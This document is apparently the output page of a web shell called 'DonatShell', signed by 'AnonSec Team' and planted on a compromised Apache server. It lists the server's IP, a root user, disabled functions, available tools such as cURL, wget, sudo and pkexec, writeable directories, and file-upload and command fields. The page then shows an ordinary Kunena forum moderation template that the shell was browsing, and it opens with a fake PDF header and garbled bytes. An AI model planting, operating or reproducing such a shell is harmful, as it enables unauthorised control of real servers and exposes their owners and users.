%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/old/components/com_kunena/template/nts_kargo/html/topic/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/html/old/components/com_kunena/template/nts_kargo/html/topic/moderate.php
<?php
/**
 * Kunena Component
 * @package Kunena.Template.Blue_Eagle
 * @subpackage Topic
 *
 * @copyright (C) 2008 - 2013 Kunena Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
 * @link http://www.kunena.org
 **/
defined ( '_JEXEC' ) or die ();

$this->document->addScriptDeclaration("// <![CDATA[
kunena_url_ajax= ".json_encode(KunenaRoute::_("index.php?option=com_kunena&view=category&format=raw")).";
// ]]>");
?>
<div class="kblock">
	<div class="kheader">
		<h2><span><?php echo !isset($this->message) ? JText::_('COM_KUNENA_TITLE_MODERATE_TOPIC') : JText::_('COM_KUNENA_TITLE_MODERATE_MESSAGE'); ?></span></h2>
	</div>
	<div class="kcontainer">
		<div class="kbody" id="kmod-container">
			<form action="<?php echo KunenaRoute::_('index.php?option=com_kunena') ?>" method="post" name="myform">
				<input type="hidden" name="view" value="topic" />
				<input type="hidden" name="task" value="move" />
				<input type="hidden" name="catid" value="<?php echo $this->category->id; ?>" />
				<input type="hidden" name="id" value="<?php echo $this->topic->id; ?>" />
<?php if (isset($this->message)) : ?>
				<input type="hidden" name="mesid" value="<?php echo $this->message->id; ?>" />
<?php endif; ?>
				<?php echo JHtml::_( 'form.token' ); ?>

				<div>
					<?php echo JText::_('COM_KUNENA_TOPIC'); ?>:
					<strong><?php echo $this->escape( $this->topic->subject ); ?></strong>
				</div>
				<div>
					<?php echo JText::_('COM_KUNENA_CATEGORY'); ?>:
					<strong><?php echo $this->escape( $this->category->name ) ?></strong>
				</div>

				<?php if ($this->config->topicicons) : ?>
				<div><?php echo JText::_('COM_KUNENA_MODERATION_CHANGE_TOPIC_ICON'); ?>:</div>
				<div class="kmoderate-topicicons">
					<?php foreach ($this->topicIcons as $id=>$icon): ?>
					<input type="radio" name="topic_emoticon" value="<?php echo $icon->id ?>" <?php echo ($icon->id == $this->topic->icon_id) ? ' checked="checked" ':'' ?> />
					<img src="<?php echo $this->ktemplate->getTopicIconIndexPath($icon->id, true);?>" alt="" border="0" />
					<?php endforeach; ?>
				</div>
				<?php endif; ?>
				<br />
				<?php if (isset($this->message)) : ?>
				<div><?php echo JText::_('COM_KUNENA_MODERATION_TITLE_SELECTED'); ?>:</div>
				<div class="kmoderate-message">
					<h4><?php echo $this->escape( $this->message->subject ); ?></h4>
					<div class="kmessage-timeby">
						<span class="kmessage-time" title="<?php echo KunenaDate::getInstance($this->message->time)->toKunena('config_post_dateformat_hover'); ?>">
							<?php echo JText::_('COM_KUNENA_POSTED_AT')?> <?php echo KunenaDate::getInstance($this->message->time)->toKunena('config_post_dateformat'); ?>
						</span>
						<span class="kmessage-by">
							<?php echo JText::_('COM_KUNENA_BY') . ' ' . $this->message->getAuthor()->getLink() ?>
						</span>
					</div>
					<div class="kmessage-avatar"><?php echo $this->user->getAvatarImage('', 'list'); ?></div>
					<div class="kmessage-msgtext"><?php echo KunenaHtmlParser::stripBBCode ($this->message->message, 300) ?></div>
				</div>
				<div>
					<?php if ($this->userLink) :
					echo JText::_('COM_KUNENA_MODERATE_THIS_USER'); ?>:
					<strong>
						<?php echo $this->userLink; ?>
					</strong>
					<?php endif; ?>
				</div>
				<?php if (!empty($this->replies)) : ?>
				<ul>
					<li><input id="kmoderate-mode-selected" type="radio" name="mode" checked="checked" value="selected" /><?php echo JText::_ ( 'COM_KUNENA_MODERATION_MOVE_SELECTED' ); ?></li>
					<li><input id="kmoderate-mode-newer" type="radio" name="mode" value="newer" ><?php echo JText::sprintf ( 'COM_KUNENA_MODERATION_MOVE_NEWER', $this->escape($this->replies) ); ?></li>
				</ul>
				<?php endif; ?>
				<br />
				<?php endif; ?>

				<div><?php echo JText::_ ( 'COM_KUNENA_MODERATION_DEST' );?>:
				<div id="modcategorieslist">
					<?php echo JText::_ ( 'COM_KUNENA_MODERATION_DEST_CATEGORY' );?>:
					<?php echo $this->categorylist ?>
				</div>

				<div id="modtopicslist">
					<?php echo JText::_ ( 'COM_KUNENA_MODERATION_DEST_TOPIC' ); ?>:
					<input id="kmod_targetid" type="text" size="7" name="targetid" value="" style="display: none" />
					<?php echo $this->topiclist ?>
				</div>

				<div id="kmod_subject">
					<?php echo JText::_ ( 'COM_KUNENA_MODERATION_TITLE_DEST_SUBJECT' ); ?>:
					<input type="text" name="subject" value="<?php echo $this->escape( !isset($this->message) ? $this->topic->subject : $this->message->subject ); ?>" />
				</div>
				<div>
					<input type="checkbox" name="changesubject" value="1" />
					<?php echo JText::_ ( 'COM_KUNENA_MODERATION_CHANGE_SUBJECT_ON_REPLIES' ); ?>
				</div>
				<?php if (!isset($this->message)) : ?>
				<div>
					<input type="checkbox" <?php if ($this->config->boxghostmessage): ?> checked="checked" <?php endif; ?> name="shadow" value="1" />
					<?php echo JText::_ ( 'COM_KUNENA_MODERATION_TOPIC_SHADOW' ); ?>
				</div>
				<?php endif ?>
				</div>
				<div>
					<input type="submit" class="button" value="<?php echo JText::_ ( 'COM_KUNENA_POST_MODERATION_PROCEED' ); ?>" />
					<a href="javascript:window.history.back();" class="button" ><span class="kbutton-back"><?php echo JText::_ ( 'COM_KUNENA_BACK' ); ?></span></a>
				</div>
			</form>
		</div>
	</div>
</div>

Anon7 - 2022
AnonSec Team